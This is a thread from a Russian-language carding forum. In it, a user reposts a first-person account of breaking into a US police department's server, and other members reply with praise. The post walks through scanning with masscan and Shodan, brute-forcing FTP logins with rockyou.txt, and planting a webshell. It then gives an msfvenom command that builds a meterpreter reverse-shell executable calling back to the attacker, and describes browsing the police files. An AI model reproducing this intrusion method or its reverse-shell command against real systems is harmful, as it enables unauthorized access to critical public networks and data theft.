Привет, гость!

Добро пожаловать на CVVPRO - крупнейший теневой кардинг форум РУнета. Чтобы получить полный доступ к форуму войди или пройди регистрацию!

Как я ломал копов USA

DiNo

Опытный user
Регистрация
9 Янв 2019
Сообщения
753
Реакции
69
Статья не моя. Все повествование пойдет от первого лица автора истории, по возможности постараюсь дополнить материал полезной инфой, для лучшего понимания.

Кидайте + если понравилось


Приветствую, мой дорогой читатель. В этой части я хочу рассказать тебе историю которая была проделана за один присест и затяг сигаретки. Пару дней ломал голову и сегодня решил всё таки изучить правда ли всё так плохо в плане ИБ в USA а именно в критических узлах..

Сегодня мы будет говорить о том как можно получить доступ к серверам и к локальной сетке целого ментовского департамента, лично мне было интересно изучать и потратить день на конечный результат и получить свою дозу андреналина и эндорфина.

Сразу отступаясь от начала хочу сказать одно. Не были зашифрованы или как то атакованы другие узлы сети копов.

Последние волосы с головы были сорваны, самовар заварен, пепельница помыта, носок натянут и началась работа по сбору информации:

1. информации о департаментах полиций во всех штатах;
2. был натравлен masscan на интересные подсети;
3. была выгружена вся возможная информация с боевого товарища Shodan ^ Fofa ^ Censys
Shodan — это первая (и, пожалуй, ведущая) поисковая система по Интернету вещей, существующая уже более семи лет.

4. были проенумерованы все возможные домены : sublist3r в помощь + словари для брута под доменов
5. были пробручены пассы сервисов на великий Rockyou.txt

К вечеру мой cherrytree был полон информации для анализа и дальнейшего мозгового штурма. Кто не знает что такое

CherryTree — это приложение предназначенное для записи коротких заметок и мыслей.

Томми ловит 3 звезды : копы преследуют нас
Скажу сразу, не стал до конца изучать и копать весь материал... Потому что на момент брута FTP сервиса на нужных IP, был получен ACCESS GRANTED на несколько штук. В основном старые файлы и дистрибутивы ПО 200x годов.
Но один из них нас и порадовал.

Были проверены права на запись и чтение, о Боги права на запись были, наш CherryTree тихо шепчет нам о том что на данном IP по ssl имеется веб морда..


e2944227105eb2d6d6ac8.png


Незамедлительно был залит WebShell, но он не сработал отдав ошибку Application Error.. была стянута пачка шеллов и один из них всё таки работал стабильно.

594f98064d1d2aacd5886.png




79b18d27579fd11e238ae.png




1e86ff0c00a1a7339f9c4.png


WHOAMI ? nt authority\network service

4dbd5f3b1d8a174f3adf7.png



5eb0859556eeff8e8da39.png


Проверяем в домене ли сервак? wmic computersystem get domain

ad7bd5e3e85831d2ef2d6.png


Посмотрим учетные записи ? net users


9ab8ec1fe404935e1bffd.png


msfvenom наш товарищ, твой выход! генерим простой .exe и забираем сессию, так как мы не преследуем цели коммерческого обогащения а лишь интереса ради делаем все агрессивно!!!
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ИП LPORT=порт -f exe > meterpreter.exe
кладем файлик в C:\temp\


156751fc3875ff84291e5.png


Ловим долгожданную сессию meterpreter и изучаем хост. Например ?


0dbeccf1b68d78d710a8d.png




2a9f2e9f993b143e3ecf7.png



Томми ловит 6 звезд : копы на танках...

Погуляем по папкам и файлам. Но креды, ФИО и другие данные не будут показываться в целях безопасности 5-й точки.


dad989dd2337ad25f7357.png




3545ee2e9f6732cce4c02.png




dd78463a4d392fe64c53e.png




35df8968747a043fc8fee.png


Моя мысль? Всё можно найти и поломать...

Главное терпение и немного удачи в нужное время.

Не стал дальше пробивать машины в локалке
Не стал повышаться в правах до админа или системы
Не стал захватывать АД..

Хотя всё это смог бы сделать, остановило лишь одно. я сделал то чего хотел изначально )
 

Lokrayng

Опытный user
Регистрация
3 Мар 2017
Сообщения
97
Реакции
0
прочитал в гта 5 звёзднабрал)))
 

iilii

Опытный user
Регистрация
26 Авг 2017
Сообщения
55
Реакции
0
Любопытный способ
 

konon

Интересующийся
Регистрация
22 Окт 2017
Сообщения
56
Реакции
1
Информативная война выходит
 

Vladser

Непроверенный
Регистрация
21 Апр 2020
Сообщения
6
Реакции
0
Вот сидишь такой со своей проблемой и думаешь, ее сложно реализовать, нужно больше знаний, ресурсов или чье-то помощь, и потихоньку можешь даже думать что это для тебя не реально, и вот как раз такие статьи дают вспомнить что в этом мире есть много возможностей и шансов, и если какой-то тип из-за простого интереса сломал базу департамента полиции в юса, то твои размышления о сложности мира полная хрень)) И ты довольный продолжаешь работать полный энтузиазма, у меня как-то так)
 

flime

Интересующийся
Регистрация
22 Окт 2017
Сообщения
47
Реакции
1
Ну ломал ты преувеличил
 

miza6

Опытный user
Регистрация
14 Авг 2017
Сообщения
96
Реакции
0
сильно на самом деле если правда
 

konon

Интересующийся
Регистрация
22 Окт 2017
Сообщения
56
Реакции
1
мне бы такой скил
 

nnOvAk

Опытный user
Регистрация
20 Мар 2016
Сообщения
67
Реакции
0
такой вари не для наших мусоров
 

mirovoi

Опытный user
Регистрация
29 Авг 2017
Сообщения
75
Реакции
1
скорее наши копы нас ломают))
 
Сверху Снизу